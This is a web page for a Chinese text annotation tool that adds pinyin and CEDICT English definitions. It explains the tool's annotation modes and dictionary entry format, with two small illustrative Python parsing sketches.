<HTML>
<HEAD>
<META name="description" content="Annotate Chinese Text with pronunciation and English definitions">
<META name="keywords" content="Chinese, perl, tools, GB, romanization, pinyin, annotate, English, learn, read, study, guide"> 

<TITLE>Chinese Annotation Tool</TITLE>
</HEAD>
<BODY BGCOLOR=LIGHTYELLOW>
<CENTER><H2>Chinese Annotation Tool</H2></CENTER>

<STRONG>My annotator can no longer run on the server that was hosting
it, so unfortunately it is currently unavailable.  If someone has
extra server space and power (the annotator can be computationally
intensive) to set up a mirror for the annotator, please let <A
HREF="mailto:[email protected]"> me know</A>.  You can download
the <A HREF="http://www.mandarintools.com/download/annotator.tar.gz">
necessary files</A> to run your own mirror site. Read the included
README.txt file.  You can also use a similar <A
HREF="http://www.all-day-breakfast.com/chinese/big5-simple.html">annotator
for Big5-encoded text</A> or <A
href="http://www.waiyu.org">Waiyu.org's</A> GB and Big5 annotation
server.  Also see <A HREF="http://www.rikai.com/perl/HomePage.pl?Language=Zh">Rikai</A> and <A HREF="http://www.adsotrans.com/">Adso</A>.  To those people who have found the annotator useful, I am
sorry that it is temporarily unusable.</STRONG>

<H2>Mirrors</H2>
<UL>
<LI><A HREF="http://www-rohan.sdsu.edu/~chinese/annotate.html">Zhang Zheng-sheng's SDSU Mirror</A>
<LI><A HREF="http://www.andante.org/annotate.html">Andante.org's Mirror</A>
</UL>

<!--
<FORM METHOD=POST ACTION="http://epsilon3.georgetown.edu/~petersee/cgi-bin/annotate.cgi">
<CENTER>

<h3>Text or Web Page to Annotate</h3>
<TEXTAREA NAME="ctext" ROWS=12 COLS=80 WRAP="physical">
http://www.voa.gov/chinese/newsfocus/news/newsinbrief.htm
</TEXTAREA>
<P>

<strong>Words to Annotate:</strong> <BR>
<TEXTAREA NAME="words" ROWS=4 COLS = 80 WRAP="physical">
</TEXTAREA>
<BR>
<INPUT TYPE=SUBMIT VALUE="Annotate!">
<SELECT NAME="atype">
<OPTION VALUE="segment">Segment Only
<OPTION VALUE="adddict">Add Dictionary Entries as footnotes
<OPTION SELECTED VALUE="js_adddict">Add Dictionary Entries at status line
<OPTION VALUE="topinyin">Convert to Pinyin
<OPTION VALUE="addpinyin">Add Pinyin Next to Characters
<OPTION VALUE="addruby">Add Pinyin Above Characters (IE5 Only)
<OPTION VALUE="addmargin">Add Pinyin/Definitions in Right Margin
</SELECT>
</CENTER>
</FORM> -->
<HR width=800>
   This tool makes learning to read Chinese easier by automatically
marking up the words in a simplified Chinese text with their
pronunciations and dictionary definitions.  You can type or paste in
GB-encoded text or the address of a Chinese web page.  You have
several choices of how the text will be annotated:

<OL>
 <LI><STRONG>Segment Only</STRONG>: In this option, the program will
add spaces between the words in the text.  No other information is
added.

 <LI><STRONG>Add Dictionary Entries at status line</STRONG>: After
segmenting the text, the program provides two ways to look up each
word.  First, when the user moves the mouse over an underlined
word, its pronunciation and definition appear in the status line at
the bottom of the browser.  Second, if the user clicks on the
underlined word, the browser jumps to the pronunciation and English
definition in a footnote further down the page.

<LI><STRONG>Add Dictionary Entries as footnotes</STRONG>: This option
is for users with older browsers that do not support JavaScript.
Holding the mouse over a word will do nothing, but clicking on it will
still take the user to the definition in the footnotes.  The file size
is also smaller than with option 2.

 <LI><STRONG>Convert to Pinyin</STRONG>: The program segments the text
and uses that information to convert the Chinese characters to pinyin.
Only the pinyin is shown in the results.

 <LI><STRONG>Add Pinyin Next to Characters</STRONG>: The
pronunciation of each character is indicated by adding pinyin by its
side.  No other information is added.

 <LI><STRONG>Add Pinyin Above Characters</STRONG>: Adds the pinyin above each
character, in an annotation style called ruby.  This currently
works only in Internet Explorer 5 (in other browsers the pinyin is placed
next to the character).

 <LI><STRONG>Add Pinyin/Definitions in Right Margin</STRONG>: Type a list of words
into the "Words to Annotate" box, one word per line with no spaces.
The annotator will add definitions of these words to the right of the
paragraph in which they occur.  If a word is not in the dictionary,
you can include its definition beside the word, using the format
described below.

</OL>
<P>
Users can add or override definitions in the "Words to Annotate"
section by using this format:
<P>
Chinese [pinyin] /English definition/
<P>
That is, the Chinese (no internal spaces), followed by one space (not
a wide Chinese space), followed by the pinyin surrounded by square
brackets (with a space between each pinyin syllable), followed by
another space, followed by the English definition/explanation surrounded
by slashes (this is the CEDICT format).  One word or definition per
line.
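<P>
As a rough illustration of this format, the following Python sketch
parses one such line.  It is not part of the annotator itself (the
segmenter is written in Perl); the name parse_entry and the sample entry
are hypothetical, and splitting the definition on internal slashes is an
assumption based on common CEDICT usage.  The sample word is written with
Unicode escapes so that the example stays plain ASCII.
<PRE>
```python
import re

# One entry per line: headword, one ASCII space, [pinyin syllables],
# one ASCII space, then the definition enclosed in slashes.
ENTRY_RE = re.compile(r"^(\S+) \[([^\]]+)\] /(.+)/$")


def parse_entry(line):
    """Parse one 'Chinese [pinyin] /English definition/' line.

    Returns a (headword, syllables, definitions) tuple, or None when the
    line does not follow the format.
    """
    match = ENTRY_RE.match(line.strip())
    if match is None:
        return None
    headword, pinyin, definition = match.groups()
    # Syllables are separated by spaces; several definitions may be
    # separated by slashes (an assumption, see the note above).
    return headword, pinyin.split(), definition.split("/")


# Hypothetical sample entry: "zhong wen", the Chinese language.
entry = parse_entry("\u4e2d\u6587 [zhong1 wen2] /Chinese language/")
```
</PRE>
With this pattern, a line that uses a wide Chinese space (U+3000) after
the word instead of an ordinary space is rejected, and parse_entry
returns None.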
<P>
   Users can use this to override the CEDICT definitions in the other
modes if the definitions or romanizations have mistakes.
<P>
  When using "Add Pinyin/Definitions in Right Margin", the first
occurrence of each word will be in bold.  Its definition will appear
more or less to its right.  Right now the tool tries to match words to
paragraphs, so be sure to have at least one blank line between paragraphs.
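<P>
To show why the blank lines matter, here is a small Python sketch of one
way words could be matched to paragraphs.  It is only an illustration
under assumed behavior, not the annotator's actual code; the function
name first_paragraph_for_words is hypothetical.
<PRE>
```python
import re


def first_paragraph_for_words(text, words):
    """Map each word to the index of the first paragraph containing it."""
    # Paragraphs are separated by one or more blank lines.
    paragraphs = [p for p in re.split(r"\n\s*\n", text.strip()) if p]
    found = {}
    for word in words:
        for index, paragraph in enumerate(paragraphs):
            if word in paragraph:
                found[word] = index
                break
    return found


sample = "aa bb\ncc\n\ndd ee\n\n\nff aa"
matches = first_paragraph_for_words(sample, ["aa", "ee", "zz"])
```
</PRE>
Without a blank line between them, two paragraphs would be treated as
one, and a definition could end up beside the wrong part of the text.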

<P>
   Click <A HREF="annotate_sample.html">here</A> for an already
annotated sample text.
<P>
   The tool currently only handles GB-encoded text.  Dictionary
definitions are drawn from Paul Denisowski's <A
HREF="http://www.mandarintools.com/cedict.html"
target="_top"> CEDICT</A> Chinese-English dictionary.  If you find a
word that does not have a definition, consider contributing it to the
CEDICT project.  The segmentation algorithm is still under
development.  Just what constitutes a "proper" Chinese word is also a
good research topic.  I will include my own guidelines at a later
date.  You can <A HREF="segmenter.html">download the segmenter
code</A> (in Perl) and run it yourself.  You can also look up entries
in CEDICT from my <A HREF="worddict.html">Chinese-English
dictionary</A> page.
<P>
Please visit my <A HREF="contact.html">guestbook</A> to tell me your
comments and suggestions for this tool.  If you came to this page
directly, you might also enjoy visiting some of my other <A
HREF="http://www.mandarintools.com" target="_top">On-line Chinese
Tools</A>.

</BODY>
</HTML>
